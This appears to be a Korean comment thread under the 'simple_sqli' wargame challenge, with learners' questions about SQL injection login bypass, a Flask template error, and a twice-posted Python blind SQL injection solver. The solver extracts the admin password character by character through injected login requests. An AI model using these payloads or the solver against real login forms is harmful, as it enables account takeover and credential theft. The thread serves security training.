simple_sqli

깻다!

다른방법으로 되네요

Internal Server Error The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application. 위와 같은 페이지로 넘어가는데 정상작동중인데 제가 잘못시도한건가요??

아이디를 admin 비밀번호를 " or "1=1 이렇게 했을 경우 왜 Hello Guest가 뜨나요?

Use a production WSGI server instead. Debug mode: off Running on all addresses. WARNING: This is a development server. Do not use it in a production deployment. Running on http://192.168.0.3:8000/ (Press CTRL+C to quit) [2022-03-19 21:47:12,299] ERROR in app: Exception on / [GET] Traceback (most recent call last): File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\app.py", line 2073, in wsgi_app response = self.full_dispatch_request() File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\app.py", line 1518, in full_dispatch_request rv = self.handle_user_exception(e) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\app.py", line 1516, in full_dispatch_request rv = self.dispatch_request() File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\app.py", line 1502, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args) File "c:\appPython\app.py", line 44, in index return render_template('index.html') File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\templating.py", line 148, in render_template ctx.app.jinja_env.get_or_select_template(template_name_or_list), File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\jinja2\environment.py", line 1068, in get_or_select_template return self.get_template(template_name_or_list, parent, globals) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\jinja2\environment.py", line 997, in get_template return self._load_template(name, globals) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\jinja2\environment.py", line 958, in _load_template template = self.loader.load(self, name, self.make_globals(globals)) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\jinja2\loaders.py", line 125, in load source, filename, uptodate = self.get_source(environment, name) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\templating.py", line 59, in get_source return self._get_source_fast(environment, template) File "c:\Users\user\AppData\Local\Programs\Python\Python39\lib\site-packages\flask\templating.py", line 95, in _get_source_fast raise TemplateNotFound(template) jinja2.exceptions.TemplateNotFound: index.html 192.168.0.3 - - [19/Mar/2022 21:47:12] "GET / HTTP/1.1" 500 - 위와 같이 오류가 나옵니다. 오류가 나오는 이유는 render_template함수를 통해서 index.html을 불러오는데 templates 폴더 안에 index.html이 없어서 나오는 것임을 인지했는데 index.html 내용을 어디서 복사해 오는 것인지 모르겠습니다... 도와주세요!!!!

#!/usr/bin/python3.9 import requests import sys from urllib.parse import urljoin class Solver: """Solver for simple_SQLi challenge""" initialization def init(self, port: str) -> None: self._chall_url = f"http://host1.dreamhack.games:{port}" self._login_url = urljoin(self._chall_url, "login") base HTTP methods def _login(self, userid: str, userpassword: str) -> requests.Response: login_data = { "userid": userid, "userpassword": userpassword } resp = requests.post(self._login_url, data=login_data) return resp base sqli methods def _sqli(self, query: str) -> requests.Response: resp = self._login(f"\" or {query}-- ", "hi") return resp def _sqli_lt_binsearch(self, query_tmpl: str, low: int, high: int) -> int: while 1: mid = (low+high) // 2 if low+1 >= high: break query = query_tmpl.format(val=mid) if "hello" in self._sqli(query).text: high = mid else: low = mid return mid attack methods def _find_password_length(self, user: str, max_pw_len: int = 100) -> int: query_tmpl = f"((SELECT LENGTH(userpassword) WHERE userid=\"{user}\") < {{val}})" pw_len = self._sqli_lt_binsearch(query_tmpl, 0, max_pw_len) return pw_len def _find_password(self, user: str, pw_len: int) -> str: pw = '' for idx in range(1, pw_len+1): query_tmpl = f"((SELECT SUBSTR(userpassword,{idx},1) WHERE userid=\"{user}\") < CHAR({{val}}))" pw += chr(self._sqli_lt_binsearch(query_tmpl, 0x2f, 0x7e)) print(f"{idx}. {pw}") return pw def solve(self) -> None: Find the length of admin password pw_len = solver._find_password_length("admin") print(f"Length of the admin password is: {pw_len}") Find the admin password print("Finding password:") pw = solver._find_password("admin", pw_len) print(f"Password of the admin is: {pw}") if name == "main": port = sys.argv[1] solver = Solver(port) solver.solve() 이 코드가 pw를 한 글자씩 알아내는 코드인데, 이 코드를 어디에 넣어ㅑ하나요? f12 콘솔에는 넣어도 안돼요ㅠㅠ

""identifier가 아닌 다른 풀이가 작동하는 건지 의문이 듭니다

서버 오류는 쿼터, 구문 바꾸고 id가 admin이면서 참 조건하면 guest로 로그인하고 반대로 하니 해결 되는데 또는 거짓이 왜 되는 것일까요?

#!/usr/bin/python3 import requests import sys from urllib.parse import urljoin class Solver: """Solver for simple_SQLi challenge""" initialization def init(self, port: str) -> None: self._chall_url = f"http://host1.dreamhack.games:{port}" self._login_url = urljoin(self._chall_url, "login") base HTTP methods def _login(self, userid: str, userpassword: str) -> requests.Response: login_data = {"userid": userid, "userpassword": userpassword} resp = requests.post(self._login_url, data=login_data) return resp base sqli methods def _sqli(self, query: str) -> requests.Response: resp = self._login(f'" or {query}-- ', "hi") return resp def _sqli_lt_binsearch(self, query_tmpl: str, low: int, high: int) -> int: while 1: mid = (low + high) // 2 if low + 1 >= high: break query = query_tmpl.format(val=mid) if "hello" in self._sqli(query).text: high = mid else: low = mid return mid attack methods def _find_password_length(self, user: str, max_pw_len: int = 100) -> int: query_tmpl = f'((SELECT LENGTH(userpassword) WHERE userid="{user}") < {{val}})' pw_len = self._sqli_lt_binsearch(query_tmpl, 0, max_pw_len) return pw_len def _find_password(self, user: str, pw_len: int) -> str: pw = "" for idx in range(1, pw_len + 1): query_tmpl = f'((SELECT SUBSTR(userpassword,{idx},1) WHERE userid="{user}") < CHAR({{val}}))' pw += chr(self._sqli_lt_binsearch(query_tmpl, 0x2F, 0x7E)) print(f"{idx}. {pw}") return pw def solve(self) -> None: Find the length of admin password pw_len = solver._find_password_length("admin") print(f"Length of the admin password is: {pw_len}") Find the admin password print("Finding password:") pw = solver._find_password("admin", pw_len) print(f"Password of the admin is: {pw}") if name == "main": port = sys.argv[1] solver = Solver(port) solver.solve() blind sql injection으로 푸는 강의에서 비밀번호 길이를 알아낸 후, 비밀번호 자체를 알아내는 코드입니다. 여기서 질문입니다. pw += chr(self._sqli_lt_binsearch(query_tmpl, 0x2F, 0x7E)) 여기서 범위가 왜 0x2F(/)부터 0X7E(~)까지 인가요? app.py에서 userpassword에 binascii.hexlify(os.urandom(16)).decode("utf8")) 이런 식으로 넣어줬는데, 그렇다면 16진수 문자열은 0-9의 숫자와 a-f의 소문자 알파벳만을 포함합니다. 쓸데없이 포함하지 않아도 되는 대문자 알파벳 범위(0x41~0x5A)도 포함하게 됩니다. 또, 굳이 시작하면 0x30(0)부터 시작하면 되는거 아닌가요? 이렇게 필요없는 범위가 들어가있을 때는 이진탐색보다 전체를 다 탐색하는게 더 효율적일 수 있지 않을까요? 16개 문자열만 탐색하면 되는데 범위가 지나치게 넓은 것 같습니다. image.png